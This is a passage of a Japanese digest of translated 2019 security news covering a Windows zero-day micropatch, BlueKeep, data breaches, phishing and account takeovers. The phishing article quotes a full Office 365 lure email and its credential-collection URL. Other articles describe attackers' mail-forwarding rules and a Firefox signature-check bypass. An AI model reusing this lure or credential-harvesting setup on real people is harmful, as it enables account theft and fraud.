 代わりにユーザは、既知の悪意あるWebサイトをブロックするために、セキュリティソフトやSmartScreenやSafe Browsingのようなブラウザ組み込みのフィルタリングサービスを信頼する必要があるだろう。


悪意あるWebサイトをブロックしているESET

 他のオプションは、既知の広告ネットワークと悪意あるサイトへの接続を全てブロックするHOSTSファイルをインストールすることである。


Windows 10タスクスケジューラ中の0-Dayフロー用のマイクロパッチがリリースされた
BleepingComputer : News>Security(2019/05/31)
 Windows 10中で未パッチのローカル特権昇格の0-Dayの脆弱性用の一時的なパッチが本日リリースされた。この修正は、0patchプラットフォームを介して配布され、再起動することなくシステムに適用することができる。
 この0-Day用のエクスプロイトコードは、研究者SandboxEscaper(彼女が10日前に公開した時BearLPEと名付けていた)から入手でき、Windows 10のタスクスケジューラ コンポーネントをターゲットにしている。
 攻撃者は、SYSTEMやTrustedInstallerのような高い特権を有するユーザに対して提供されるファイルを乗っ取るためにターゲットのホストを改竄した後、このバグを使用することができる。
 Will Dormann(CERT/CCの脆弱性アナリスト)によると、この脆弱性攻撃は、X86システムでは100%の信頼性があるので、X64マシンに再コンパイルする必要がある。
 0patchの共同設立者Mitja Kolsekは、古いシステムから最新のシステムに追加することが可能な、タスクファイルのレガシー(【訳註】新しいものにとって代わられたものを指す言葉)サポートから生じていると説明している。  以下のビデオは、脆弱性のあるシステムで、このマイクロパッチが動作する方法をデモしている。

 「Windows XP schtasks.exeをWindows 10で実行すると、レガシーRPC関数(Remote Procedure Call。「関数呼び出し」をローカルではなく別の環境に接続して代わりに実行しようというもの(Quiitaより))がコールされる。これは順番に、SchRpcSetSecurityのような現在の関数をコールすることになる」とKolsekは発言している。

 この欠陥は何か? 既にSandboxEscaperや他の研究者によって疑われているように、これは不正な成り済ましのケースであるが、ひねりが加えられている。最初に問題の原因と考えられていたSchRpcSetSecurityメソッドは、正確に呼び出し元を偽装して、正確に実行している。 。

 彼は続けて、「taskcomp.dllスレッド中のコードは、Local Systemとして実行され、呼び出し元は攻撃者である。しかし、このコードがSchRpcSetSecurityを呼び出す前では、呼び出し元は偽装されていない。SeRestorePrivilege特権を有効にする(ファイルパーミッションを変更する必要がある)ために『自身』を偽装している。」
 その結果、この要求は限定的ユーザではなくLocal Systemから発生する。これはそのマシン上での特権の昇格なので、重要なフィアルをコントロールすることができる。
 このマイクロパッチは、メモリ内で修正命令を実行し、通常ユーザがシステムファイルに持っているパーミッションのセットの変更を妨げる。


画像をクリックすると拡大されます

 既存の0patchユーザーは全員、既に修正プログラムを持っており、自分のマシン上で実行している。マイクロパッチを取得するには、アカウントを作成し、0patchエージェントをインストールする必要がある。
 現時点では、Windows 10 v1809 32bit、Windows 10 v1809 64bit、およびWindows Server 2019で利用可能であるが、他のバージョンでも利用可能になると思われる。有料顧客は、0patchサポートアドレスをe-Mailし、他のプラットフォームにこのパッチを移植することを要求することができる。


Flipboadユーザのe-Mailアドレスとハッシュ化パスワードが盗まれた
Graham Cluley : News(2019/05/29)
Flipboard(【訳註】AndroidとiOS、WindowsPhone に対応する雑誌形式のソーシャルネットワークアグリゲーションアプリケーションソフトウェア)は、「セキュリティ上の重大事案」(単にハッキングされたと言うことに代わる企業用語)について、そのWebサイト上で通知を発表した。
 世界中で数百万人の人々によって使用されている新しいアグリゲーションサイトは、最近ハッカーがFlipboardユーザのアカウントの詳細(ユーザ名、e-Mailアドレス、ハッシュ化パスワード、サードパーティーのソーシャルメディアアカウント用のアカウントトークン)を含むデータベースにアクセスしていたことを発見した。
 Flipboardによると、ハッカーがアクセスした期間は2回(2018年6月2日から2019年3月23日の凡そ10ヶ月間と、2019年4月21-22日)ある。
 ユーザはFlipboardから、ユーザのパスワードはリセットされたと伝えるe-Mailを受け取っている。次回のログイン時に、ユーザは新しいパスワードを作成するよう要請されるだろう。


 明らかに、インターネット上の他の場所で侵害されたパスワードを使用していないことを確認することはユーザにとって理にかなったことである。このサイト上で始終論議しているように、異なる場所で同じパスワードを決して使用してはならない。あなたの貧弱な人間の脳が、異なる場所での多くの一意で複雑なパスワードを思い出すことができないのであれば、あなたは私と同じ状況にある。代わりに適切なパスワードマネージャを使用しなさい。
 e-Mailアドレスが現在ハッカーの手に落ちている可能性を考慮しなさい。ユーザはFlipboardから送信されたかのようなフィッシングe-Mailに気をつけるのは賢明なことだろう。
 伝えられるところによると、Flipboardはパスワード保管用のSHA-1ハッシュ化アルゴリズムをbcryptに切り替えている。これは、2012年に重視された。

 ユーザが、2012年3月14日以降パスワードを作成もしくは変更している場合、bcryptと呼ばれる関数でハッシュ化されている。ユーザがその時点以降パスワードを変更していない場合は、SHA-1でソルト付きハッシュ化されている。

 率直に言って、Flipboardが、2012年により強力なハッシュアルゴリズムを導入した時点で、ユーザーにパスワードの再設定を強制することが適切な考えだったかもしれない。
 Flipboardは、セキュリティ侵害に関して法執行機関に通知したと発言している。


フィッシングe-Mailは、Office365の「ファイル削除」警告を装っている
BleepingComputer : News>Security(2019/05/28)
 新たなフィッシングキャンペーンは、"Office 365 Team"の受信者への警告(異常な数のファイル削除がアカウント上で発生している)を装って進行中である。
 以下に示すフィッシングスカムは、重大度-中が発生しているとするOffice 365サービスからの警告を装っている。次に、ユーザのOffice 365アカウントで多量のファイル削除が発生しており、ユーザはこの警告を検証する必要があるとしている。


Office 365フィッシングメール(画像をクリックすると拡大されます)

 このフィッシングスカムの本文は以下である。

A medium-severity alert has been triggered
Unusual volume of file deletion
Severity: Medium
Time: 05/26/2019 07:36:39 pm (UTC)
Activity: FileDeleted
Details: 15 matched activities in 5 minutes.
View alert details

Thank you,
The Office 365 Team

 "View alert details"リンク(【訳註】この記事の最初の画像の下部)をクリックすると、インチキのMicrosoftアカウントログインページに連れ込まれログインを促される。


フィッシングスカムが連れ込むページ(画像をクリックすると拡大されます)

 このページはAzure(【訳註】オープンで柔軟な、エンタープライズ レベルのクラウド コンピューティング プラットフォーム(Microsoftのページより))をホストしているので、このサイトはMicrosoftによって署名された証明書で保護されている。これにより、Microsoftが認可したURLとして表示されるようになり、スキームに正当性が追加される。 Azureはこの目的のために詐欺師による使用が増大している。


Microsoftの証明書

 パスワードを入力すると、e-Mailアドレスとパスワードが https://moxxesd.azurewebsites.net/handler.php Webページに送信される。このWebページは攻撃者の制御下にある。詐欺師は、入力された認証を保存し、後にこれらの情報を取得する。


認証を盗むための送信(画像をクリックすると拡大されます)

 連れ込まれたページは、次に犠牲者を正当な https://portal.office.com にリダイレクトするので、再びログインを要請されることになる。


正当なMicrosoftのログインページ(画像をクリックすると拡大されます)

 今まで、我々は常に疑わしいドメインに関してはフィッシング連れ込みぺージか否かを詳細に検討するようにユーザにアドバイスしてきた。フィッシングページをAzure上にホストすることで、連れ込まれるページは、windows.net や azurewebsites.net のようなドメインに配置されているので、多少扱いにくくなっている。
 MicrosoftアカウントとOutlook.comログインに関しては、ログインフォームはmicrosoft.com, live.com, outlook.comドメインだけであることを覚えていることが重要である。Microsoftログインフォームを他のURLで表示された場合には、近づいてはならない。


Microsoftからの警告: SIDを削除するとWindows 10は破壊される
Sophos : NakedSecurity (2019/05/22)
 Microsoftは、管理者やユーザが万一偶然にアプリケーションを破壊した場合でもWindows account security identifier (SID) の’capability’(ケーパビリティ)と呼ばれるものを削除しないように注意を促している。
 Windows 8とWindows Server2012以降のOSの一部であるある種のSIDにMicrosoftが警告を発生させた理由は明らかではないが、認識の欠如がサポートの問題を発生させていることを意味している。
 UNIXのUIDに少しにているが、SIDSは、ユーザ、アカウント、グループを同定し、その他の人々にアクセスを許可しているのか否かを決定するためのWindowsシステムの基本部分である。
 Windowsユーザ(例えば、Aliceとしよう)が彼女の名前で彼女のコンピュータにアカウントを設定すると、Windowsは、一意のSIDを使用してそのアカウントを同定する。Aliceは希望すれば彼女のアカウント名を変更することができる(AliceBやJeffにさえ)が、Windowsに識別させる基になるSIDは常に同じ名前のままである。
 2012年の全面的な見直しで、SIDSはファイル アクセス、ドライブ ロケーション、証明書へのアクセス、カメラ、リムーバルストレージ等を含むように拡張された
 Microsoftによると、Windows 10 1809は、これらの300以上を使用することができ、そのうち最も一般的なものは、以下のようなものである。

S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681

 これが、読み取り専用で「不明なアカウント」として表示されている場所をレジストリ・エディタ(スタート > ファイル名を指定して実行 > regedt32.exe)を使用して徹底的に掘り下げている全ての人々を混乱させている理由を確認するのは簡単である。
 到達した後、これは再起動後に再稼働するためにWindows自体が必要とするもの(ある種のグローバルSID)であるかもしれないと思わせる。
 これは、SIDの目的を理解せずにSIDを削除したあらゆる人々が、Windows自体を破壊する可能性があることを意味している。Microsoftの警告では、

 レジストリもしくはファイルシステムパーミッションからケーパビリティSIDSを削除するな。ファイルシステムパーミッションやレジストリパーミッションからケーパビリティSIDSを削除すると、機能やアプリケーションが不正に動作する可能性がある。ケーパビリティSIDSを削除すると、それを戻すためにUIを使用できない。

 更に検索すると、このSIDに関してサポートフォーラムでアドバイスを求めるユーザがいた。正当なものであることに気づかずに、管理者がSIDを削除し、そのことを後悔している例である。

分かり難い名前

 どれが正当なSIDSで何れが疑わしいSIDSなのかを管理者が解決する方法は?
 Microsoftは、ケーパビリティIDは「分りやすい」(つまり理解しやすい)ものではないと認めているため、これらを単独で使用しても役に立たないと、指摘している。

 設計上、ケーパビリティSIDを分りやすい名前にはしない。

 この答えは、全てのケーパビリティSIDSは、レジストリエントリ(スタート > ファイル名を指定して実行 > regedt32.exe)中に表示されているので、以下のレジストリエントリを見て回るべきであるということである。

HKEY_LOCAL_MACHINE \ ソフトウェア \ Microsoft \ SecurityManager \ CapabilityClasses \ AllCachedCapabilities

そのSIDが、このリストに載っていない場合は、それが未だ合法的なサードパーティのケーパビリティであるかもしれないということを念頭に置いて、更なる調査を必要としている。


Windows 10 のKB4494441アップデートはインストールを2回表示する可能性がある
BleepingComputer : News>Security (2019/05/14)
 Microsoftとユーザのレポートによると、2019年5月のWindows 10 KB4494441累積アップデートは、一部のコンピュータでインストールを2回表示するバグが発生中である。ユーザが、このアップデートを2回確認しても、何も心配することはないし、Microsoftはこの問題を認識している。
 この問題は、このアップデートが二つの異なるインストレーションのステージを要求することで発生する。最初のステップは、アップデートと再起動の部分、インストールの二回目のステップは、このアップデートが再度提供され再起動させられる。ステージが正常に完了すると、このアップデートはインストレーションエントリを作成する、これが二度の表示に導くことになる。
 このバグが発生すると、以下の画像に示したように、"2019-05 Cumulative Update for Windows 10 Version 1809 for x64-based Systems (KB4494441)" が2回アップデートの履歴にリストされているのを確認するだろう。


KB4494441が2回インストールされている(画像をクリックすると拡大されます)

 このアップデートをインストールし、一度だけしかリストされていない場合を含め、これは全てのWindows 10ユーザに影響を与えないことに注目すべきである。
 KB4494441サポート記事は、このバグに関連した既知の問題と共にアップデートされている。これを以下に示す。

 一部の顧客は、彼らのデバイスにKB4494441が2回インストールされるとレポートしている。
 特定のシチュエーションで、アップデートをインストールすると、複数のダウンロードと再起動のステップが要求される。このインストレーションの二つの中間ステップが問題なく完了すると、あなたのアップデートの履歴ページの表示は、このインストレーションが2回問題なく完了したことをレポートする。

 あなたに要求されるアクションは何もない。このアップデートのインストレーションは時間が掛かり数回の再起動を要求するかもしれないが、全ての中間インストレーション・ステップが完了した後、無事にインストールされるだろう。

 アップデートの履歴が最新の累積アップデート(LCU)のインストレーションを反映するように、このアップデートを改善するための作業を行っている。

 Microsoftは、この種の問題が発生しないように修正を作業中であると述べている。この修正は、このアップデートのアップデート版か、サービススタック更新プログラムとして提供されるだろう。

KB4494441は重要なアップデートである

 ユーザは、たとえリストに2回あろうともKB4494441をアンインストールしようとしてはならない。このアップデートは多くのバグフィックスとセキュリティアップデート(最近アナウンスされたMicroarchitectural Data Sampling (MDS)脆弱性(【訳註】 数日前に報道されたIntel製CPUの脆弱性)を含む)を含んでいる。
 ZombieLoad, RIDL, Falloutとも呼ばれるこの新しいMDS投機的実行の脆弱性は、悪意あるプロセスがCPUのメモリバッファから情報を盗むことを可能にするものである。これは、暗号化キー、パスワード、他の重要な情報を盗むことも可能にする。
 それ故、 これらの攻撃を妨げる役に立つ緩和策を含んでいるので、KB4494441がインストールされたままにしておくことが重要である。
 我々はまた、セキュリティアップデート用の既知のMDSの脆弱性アップデートとアドバイザリ、緩和策、およびハードウェアデバイスや他の企業のソフトウェア用のアドバイザリのリストも作成している。


Microsoft: 緊急のリモートデスクトップフローを修正、ワームマルウェアをブロック
BleepingComputer : News>Security (2019/05/14)
 Microsoftは本日、リモートデスクトップサービス(RDS)中に発見されたリモードコード実行(RCE)の緊急の脆弱性をパッチした。これは、悪意ある行動主体が脆弱性のあるRDSインストレーションを実行しているコンピュータ間を伝搬するように設計したマルウェアの作成を可能にするものである。
 MicrosoftのWindows IT Pro Centerによると、「リモートデスクトップサービス(RDS)は、個々の仮想化アプリケーションの提供、安全なモバイルおよびリモートデスクトップアクセスの提供、エンドユーザにクラウドからのアプリケーションおよびデスクトップを実行する能力の提供など、あらゆる最終顧客に必要な仮想化ソリューションの構築に最適なプラットフォームである。」
 Microsoftのセキュリティアドバイザリでは詳細として、

 認証されていない攻撃者が RDP を使用して標的のシステムに接続し、特別に細工された要求を送信する場合、リモート デスクトップ サービス (旧称ターミナル サービス) にリモートでコードが実行される脆弱性が存在します。攻撃者がこの脆弱性を悪用した場合、標的のシステムで任意のコードを実行する可能性があります。攻撃者は、その後、プログラムのインストール、データの表示、変更、削除などを行ったり、完全なユーザー権限を持つ新たなアカウントを作成したりする可能性があります。
 この更新プログラムは、リモート デスクトップ サービスが接続要求を処理する方法を修正することにより、この脆弱性を解決します(【訳註】Microsoftの日本語サイトより引用)

Windowsの旧バージョンが影響を受ける

 CVE-2019-0708として追跡される緊急のRDS脆弱性は、サポート中のWindowsの旧バージョン(即ち、Windows 7, Windows Server 2008 R2, and Windows Server 2008)にのみ影響を与える。影響を受けるバージョンのセキュリティアップデートは、Microsfot Security Update Guideから利用可能であると、Microsoftは発言している。
 「Windowsのサポート中のバージョンを使用し、自動アップデートを有効にしているユーザは、自動的に保護される」とMicrosoftは発言している。
 Windows XPやWindows 2003のようなサポート対象外のオペレーティングシステムもまた、この緊急のCVE-2019-0708フローの影響をうける。これらのWindowsバージョンのユーザは、新しいOSにアップグレードするか、KB4500705から利用可能なセキュリティアップデートを適用するかの何れかを実行しなさい。
 Windows 8とWindows 10ユーザは、最新のWindowsのリリースでMicrosftによって提供された、強化されたセキュリティのために、この脆弱性による影響は受けない。

このセキュリティフローは'wormable'(ワームの侵入を許す)ものであり、緩和可能

 この脆弱性のあるシステムでRemote Desktop Services Connectionsに関してNetwork Level Authentication (NLA) を有効にすると、「リモートデスクトップ接続を確立してログオン画面が表示される前にユーザー認証を完了することができるため、この脆弱性は部分的に緩和される。これは、悪意あるユーザと悪意あるソフトウェアからリモートコンピュータの保護に役立つ、より安全な認証である。」
 それにも拘わらず、潜在的な攻撃者が、RDSが有効になっているシステムの認証を受けるために必要な証明書を持っている場合には、依然としてRCE脆弱性を悪用することができる。
 更に悪いことに、Microsoft Security Response Center (MSRC)のインシデント・レスポンス ディレクタSimon Popeは、以下のように発言している

 この脆弱性は事前認証であり、ユーザの操作を要求しない。換言すれば、この脆弱性は'wormable'(ワームの侵入を許す)である。これは、この脆弱性を攻撃する将来のあらゆるマルウェアが、2017年に世界中に拡散したWannaCryマルウェアに類似した方法で、脆弱性のあるコンピュータから脆弱性のあるコンピュータに拡散できることを意味している。

 これは、身代金要求攻撃、ハッカー、このような'wormable'(ワームの侵入を許す)リモートデスクトップサービスのセキュリティフローのような脅威に晒されるため大変危険であるにも拘わらず、多くのサーバーが遠隔作業者のインターネット接続のためにリモートデスクトップサービスを公にアクセス可能にしているので、とりわけ危険である。
 「我々は、この脆弱性に対する攻撃を未だ確認していないが、悪意ある脅威の主体が、この脆弱性用の攻撃を記述し、それを彼らのマルウェアに組み込む可能性は高い」とMicrosftは発言している。
 Microsoftは、「NLAが有効か否かに拘わらず、影響を受ける全てのシステムは、可能な限り早急にアップデートすべきである」とアドバイスしている。
 Microsoftのスポークスマンのステートメントによると:

 我々は2019年5月14日に、この脆弱性を解決するためのアップデートをリリースした。旧オペレーティングシステムを使用している顧客は、Windowsの最新バージョンにアップデートするか、あるいは、早急にこのアップデートを適用することを推奨する。詳細な情報は、我々のブログとセキュリティアップデートガイドを参照されたい。」


ユニクロが侵害され46,100アカウントを超えるデータを漏洩
BleepingComputer : News>Security (2019/05/13)
 この件の詳細に関しましては、以下のリンクのサイトを参照して下さい。

Internet Watch > ニュース > ユニクロ・GU公式サイトで不正ログイン、身体サイズや氏名・住所など含む46万件の個人情報が閲覧された可能性

Fast Retailing公式サイト > 「リスト型アカウントハッキング(リスト型攻撃)」による弊社オンラインストアサイトへの不正ログインの発生とパスワード変更のお願いについて


Firefoxアドオンは証明書の有効期限切れにより無効化された
BleepingComputer : News>Security (2019/05/03)
アップデート: Mozillaは、この問題に関する臨時の修正をリリースした。詳細情報は、この記事の末尾を参照。
 Mozilla Firefoxユーザは、彼らのアドオンの全てが突然無効化されていることを発見している。これは。Mozillaアドオンの署名に使用されている中間証明書の期限切れによって発生している。
 Reddit、Twitter、Bugzillaのバグレポートでの多くのレポートによると、ユーザは、彼らのアドオンが突然「これらの拡張機能は、現在のFirefox標準に適さないため無効化されています」のメッセージと共に無効化されたと主張している。


無効化された拡張(画像をクリックすると拡大されます)

 彼らが無効化されたアドオンをFirefoxのアドオンサイトから再インストールした場合、彼らは「ダウンロードに失敗しました。接続を確認して下さい」のエラーメッセージが表示される。


アドオンインストール時のエラー(画像をクリックすると拡大されます)

 テストしたところ、私は幾つかのアドオンをインストールできなかったが、全てではなかった。これは、有効期限が切れていない別の証明書によってアドオンが署名されていることが原因と考えられる。
 Bugzillaのバグレポートによると、Mozillaアドオンの署名に使用された中間署名証明書は、協定世界時2019年5月4日の深夜(日本時間5月5日、09:00)に期限切れになった。MozillaアドオンはFirefoxに使用された順番に署名される。コンピュータがその時刻に到達すると、Firefoxは自動的にアドオンを無効化する。


Mozillaバグレポート(画像をクリックすると拡大されます)

 このバグレポートの最新の投稿はKevin Brosnan(Mozillaの上級品質保証技術者)によるものであり、彼らは、この問題を認識しており、問題を調査中であると述べている。


Mozillaは問題を調査中(画像をクリックすると拡大されます)

アドオンを再稼働させるには

 あなたにとって重要ではないアドオンに関しては、Mozillaが問題を解決し、あなたのアドオンが再稼働するまで待ちなさい。
 待てない人や、インストールしている拡張を即座に有効にしたい人には幾つかのオプションがある。

方法1: コンピュータの時計を数日前に戻す。
 最も簡単な方法は、証明書を期限切れにしないようにするために、コンピュータの時計を数日前に戻すことである。これは上手くいくが、今日期限切れになった証明書でアクセスしたあらゆるサイトでも同様に上手くいくことを意味している。あなたのローカルメールクライアントからのEmailは、誤った日付になる。そして、一部のサイトは、間違った日付を表示するだろう。

方法2: FirefoxのNightlyビルドかDeveloperビルドをインストールする。
 もう一つのオプションは、FirefoxのNightlyビルドかDeveloperビルドをインストールすることである。これらのバージョンでは、拡張へのシグネチャ要求を無効化することができる。  FirefoxのNightlyビルドやDeveloperビルドからこれを実行するには、about:configに進み、xpinstall.signatures.requiredを検索する。その設定をダブルクリックしFalseに切り替える。


xpinstall.signatures.required設定(画像をクリックすると拡大されます)

 この設定をFalseにすると、無効化されたアドオンを再使用することができる。

方法3: アドオンのデバッグを有効にする。
 ある読者が、デバッグモードを有効にし、それらのXPIファイルからローカルに拡張機能をインストールするという追加の提案を提示してくれた

 about:debuggingに移動して、addon debuggingチェックボックスをオンにする。その後、必要なアドオンのxpiファイルをロードする。すべての人に有効ではあるが、上記の回避策より遥かに複雑である。
 以下に示すように、「Firefoxに追加」ボタンを右クリックして「名前を付けてリンク先を保存」を選択することで、Firefoxアドオンサイトから直接アドオンをダウンロードすることができる。


アドオン用のXPIファイルをダウンロード(画像をクリックすると拡大されます)

アップデート 米国東部標準時 2019/05/04 午前10:25(日本時間 5月5日 00:25): MozillaはStudiesシステムを介してこの問題に関する臨時の修正をリリースしたと述べている。このシステムは、完全なアップグレードを実行せずにFirefoxに変更の適用を可能にする


Mozillaからの解決策(画像をクリックすると拡大されます)

 Studyシステムを使用するには、以下に示すように、Firefoxのメニューから、編集 > 設定 > プライバシーとセキュリティ > Firefox に調査のインストールと実行を許可する(Firefoxのデータ収集と利用についてセクション)を有効にしておく必要がある(【訳註】Defaultで有効)。

 このアドオンの修正がFirefoxにインストールされている否かを確認するには、about:studiesに進み、実施中の調査リスト、もしくは、完了した調査リスト中に"hotfix-reset-xpi-verification-timestamp-1548973"呼ばれる調査を探す。あなたは、実施中の調査リスト中に、もしくは、完了した調査リスト中にも同様に"hotfix-reset-xpi-verification-timestamp-1548973"と呼ばれる調査を確認するかもしれない。


Studies(調査)中に表示されるホットフィックス

 このホットフィックスがインストールされている場合は、あなたが最早Studies(調査)を受け取ることを希望せず、アドオンが再び動作しているのであれば、Studiesを再び無効化することができる。


MegaLockerとNamPoHyu Virus身代金要求型マルウェア用の復号プログラムがリリースされた
BleepingComputer : News>Security (2019/05/02)
 Emsisoftは、SambaサーバをターゲットにしていたMegaLockerとNamPoHyu Virus身代金要求型マルウェア用の復号プログラムをリリースした。現在、犠牲者は彼らのファイルを復号するために無料でこの復号プログラムを使用することができる。
 先月我々は、MegaLocker(NamPoHyu VirusはMegaLockerの新しいバージョン)身代金要求型マルウェア感染は、Sambaサーバをターゲットにし、遠隔からそのデータを暗号化していることをレポートした。その時点で、ファイルを復号化する方法が見つかるかもしれないので、犠牲者は身代金を支払わないようにと述べた。
 我々はMegaLockerとNamPoHyu Virusの犠牲者に無料の復号プログラムがEmsisoftから利用可能になったことを、喜びのうちにアナウンスする。

MEGALOCKER DECRYPTOR(ダウンロードはこちらから)

 ダウンロードしたら、復号を開始する前に必ずインターネットに接続しておくことが必須である。起動し、脅迫文へ移動し、それを選択する。この復号プログラムは犠牲者の復号キーを復元しようとする。


MegaLocker & NamPoHyu復号プログラム

 キーが発見されると、ファイルを復号するためにこの復号プログラムを無料で使用することができる。


復号されたファイル

 この復号プログラムに関する質問があるのなら、我々のフォーラム中のMegaLocker NamPoHyu Virus Support & Helpトピックで自由に質問しなさい。

身代金要求型マルウェアの開発者は不満である

 我々が身代金を支払わないように犠牲者に告げた時、この開発者は明らかに不満であった。
 このフォーラムでの我々のMegaLockerトピックへの一連の投稿で、この身代金要求型マルウェアの開発者は、復号プログラムが一週間以内にリリースされなければ、身代金を二倍にすると脅してきた。


NamPoHyu開発者による投稿(画像をクリックすると拡大表示されます)

 この開発者は、イライラを募らせ、我々の支援者を「悪魔」と呼ぶまでに至った。その後、彼らはこの身代金要求型マルウェアに使用されている暗号化アルゴリズムを変更すると脅してきた。


身代金要求型マルウェア開発者によるもう一つの投稿(画像をクリックすると拡大表示されます)

 この開発者が、彼の約束を守るか否か定かでないが、将来のバージョンがリリースされたなら、我々は間違いなく説明する。けれども現在、犠牲者は無料のEmsisoftの復号プログラムを使用してファイルを取り戻すことができる。


Office 365アカウントがBECスカム中に使用されたATO攻撃を介して侵害されていた
BleepingComputer : News>Security (2019/05/02)
 Office 365アカウントがアカウント乗っ取り(ATO)攻撃のターゲットにされ侵害されていた。これは、サイバー犯罪者が後に、スピアフィッシングやBEC(ビジネスメール詐欺)攻撃から悪意あるキャンペーンに至るまでの様々な不正な目的のために使用される。  Barracuda Networksの研究者が本日公開したレポートによると、脅威の行動主体によって2019年4月の一月の間に、ATOを介して侵害した凡そ4000アカウントを使用して、150万を超える悪意とスパムE-mailが配信されていた。
 また、Barracudaの顧客をターゲットにしたATO攻撃を解析したところ、この研究者は、モニターした組織の29%が、Office 365アカウントに侵入されていたことを発見した。
 Office 365アカウントを成功裏にハッキングすると、スカマーは、彼らの挙動を隠蔽するために悪意あるメールボックス規則を追加し、「侵害された凡そ4000アカウントの34%」のアカウントから送信された悪意ある広告メール、フィッシングメール、スパムメールを削除する。
 Barracudaの研究チームは、中国のIPアドレスから発信された疑わしいログインが、Office 365 ATO攻撃を調査している間、試行回数全体のほぼ4分の1を占めていることを発見した。この攻撃者はまた、ブラジル(9%)、ロシア(7%)、オランダ(5%)、ベトナム(5%)にあるサーバーも使用している。

Office 365攻撃方法

 ATO攻撃を介して彼らのターゲットのアカウントに潜入するために、サイバー犯罪者は「ブランドの偽装、ソーシャルエンジニアリング、フィッシング」を組み合わせて使用している。以前に設定したフィッシング・ランディングページ(【訳註】外部からWebサイトにアクセスした時最初に開くフィッシング用のページ)を訪問させ、彼らのアカウントの資格情報を送信させることを、犠牲者になる可能性のある者に確信させるためにMicrosoftのような有名企業になりすましている。
 悪意ある行動主体はまた「今迄のデータ漏洩で取得したユーザ名とパスワードを悪用していた。人々がしばしば同じパスワードを異なるアカウントでも使い回しているという事実に基づき、ハッカーは盗んだ認証情報を再使用し、他のアカウントへのアクセスを取得することが可能だった」とBarracudaは発言している。
 個人用E-mailの盗まれた認証情報は後に、BEC (Business Email Compromise、ビジネスメール詐欺)あるいはEAC (Email Account Compromise)としても知られるキャンペーンの一部として、「ビジネスE-mailへのアクセスを取得しようとして」侵害されたOffice 365アカウントへのアクセスを取得するために使用されていた。
 ブルートフォース攻撃(ユーザが極めて簡単に推測できるパスワードを設定しているという事実を悪用する攻撃方法)もまた、この研究者によって観測されている。「攻撃はまた、Webと商用アプリケーションを介して行われている (SMS(【訳註】ショートメッセージサービス)を含む)」とも、このレポートは述べている。

侵害されたOffice 365アカウントは犯罪者によって乱用されている

 サイバー犯罪者は、「攻撃を成功させるために、会社の業務方法、使用しているE-mailシグネチャ、金融取引の処理方法を知るために活動を監視し追跡している(他のアカウントへのログイン認証情報の取得を含む)。」
 攻撃の次の段階で、犯罪者は、ソーシャルエンジニアリングとスピアフィッシングの両方を使用し、侵害されたOffice 365アカウントを使用して財務部の役員や従業員の一部をターゲットにしている。
 FBIのInternet Crime Complaint Center (略称IC3、米国インターネット犯罪苦情センター)が4月に公開した2018年度インターネット犯罪レポートで説明されているように、この種のスカムは、背後に凡そ12億ドルの金融損失が存在しており、犯罪者は電信送金をターゲットにし、彼らの制御下にある銀行のアカウントにそれらをリダイレクトさせることに成功している。
 個人と企業の両方を対象にしたBEC/EAC攻撃は、IC3によると、信用/ロマンス詐欺、不動産詐欺、投資詐欺と共に、サイバー犯罪者にとっては最も利益をもたらすものであった。これは、2018年の犯罪タイプで、犠牲者に合計7億6300万ドルの損失をもたらしたものである。

IC3の調査結果は、Proofpointの電子メールセキュリティのRob Holmes副社長によっても確認されている。彼は、「企業が電子メールの成り済まし攻撃の標的とされた頻度は、2018年では2017年との比較で3倍になっており、性能は高度になってきている。世界的な経済的影響に加えて、毎年この種の事件の多くが様々な理由で過少報告または未報告になっていることは注目に値する」と発言している。
 Barracudaのレポートによれば、ハッカーはまた、「個人情報、財務情報、機密データを盗み取り、個人情報の盗難、詐欺、その他の犯罪にそれを使用することによって攻撃を収益化するために、侵害したアカウントを使用する。

軽減策

 Barracudaは、電子メールゲートウェイやスパムフィルタをバイパスするように設計された攻撃を検出しブロックすることができる機械学習ベースの防御ソリューションを使用し、「ビジネスメール詐欺とブランド成り済ましを含むスピアフィッシング攻撃に対して」彼らのユーザを保護することを組織にアドバイスしている。
 マルチファクタ認証、2ファクタ認証、二段階認証の使用もまた異なることを実行することができる。攻撃者は特別な保護レイヤーのために彼らが盗んだアカウント情報を悪用することができない。
 Barracudaはまた、アカウントが危険に晒され不正目的で使用されたりした場合に、監視と警告のために設計されたATO検出および保護ソリューションを配備したり、悪意あるルール作りをされないようにメールボックスを監視したり、スピアフィッシング攻撃を認識するように従業員を訓練したりすることは、ハッキング対策の実行可能な解決策であると提案している。


サイバー犯罪者は、仮想通貨を盗むためにハッキングされたMicrosoft E-mailアカウントを使用している
Sophos : Naked Security (2019/05/01)
 先月ハイジャックされたMicrosoft E-mailアカウントが仮想通貨を盗むために使用されていた。
 4月初めにMicrosoft E-mailへの攻撃により、ハッカーはユーザのコンテンツを読むことが可能になっていたと、Motherboardは報道している。今週、攻撃者が彼らの仮想通貨交換口座を改竄し資産を空にするために、彼らのE-mailを使用していたと発言している数人の犠牲者が発見された。
 そのような犠牲者の一人Jevon Ritmeesterは、侵入者に仮想通貨取引所Krakenの彼の口座を侵害された後、このハッキングの結果として1ビットコイン(【訳註】 2019/05/02時点で、約60万円)以上を失ったと主張している。
 先週のTweakers technologyフォーラムでの投稿で、Ritmeasterは以下のように発言している:

4月8日、私は仮想通貨の状態を確認したかった。私は毎日Kraken.comを見てはいない、数カ月見ないこともある。

 彼が口座をチェックした時、彼はKrakenパスワードが最早機能しないことを発見した。そして、彼のOutlookの受信箱にメールが一通も存在していないことを見つけた。彼がゴミ箱の中を見た時、パスワードリセットE-mailだけを発見した
 この犯罪者は、パスワードのリセットを要求し、E-mail処理ルールを作成することによって、彼から確認E-mailを隠蔽した。このルールは、受信E-mail中に特定のテキストが発見されると、それらE-mailをローカル メールボックスから削除する前に、攻撃者のアドレスに転送するものである。これで、攻撃者がRitmeesterのパスワードをリセットし、彼の口座を空にすることが可能になる。
 Redditの他のユーザ達は、同じことが彼らにも発生していたと述べている。その一人Jefferson1337は、仮想通貨で凡そ5000$失ったと発言している。
 先月初め、Microsoftは、ハッカーが顧客サポートアカウントの1つにアクセスした後に、一部のE-mailアカウントが侵害されたことを、TechCrunchに対して認めている。報道によると、このハッカー達は、E-mailアカウントが企業レベルのものでない限り、あらゆるE-mailアカウントにアクセスできた。
 Microsoftは3月末の攻撃に気付いていた。この侵害は、犯罪者がOutlook, Hotmail, MSNアカウントの一部のコンテンツへのアクセスを可能にしていた。
 Ritmeesterを含む数人の犠牲者は、財産の損失を招いたMicrosoftに対し法的措置が適切であるかもしれないと持ちかけている。  Redditのユーザshinratechlabsは、以下のように発言している:

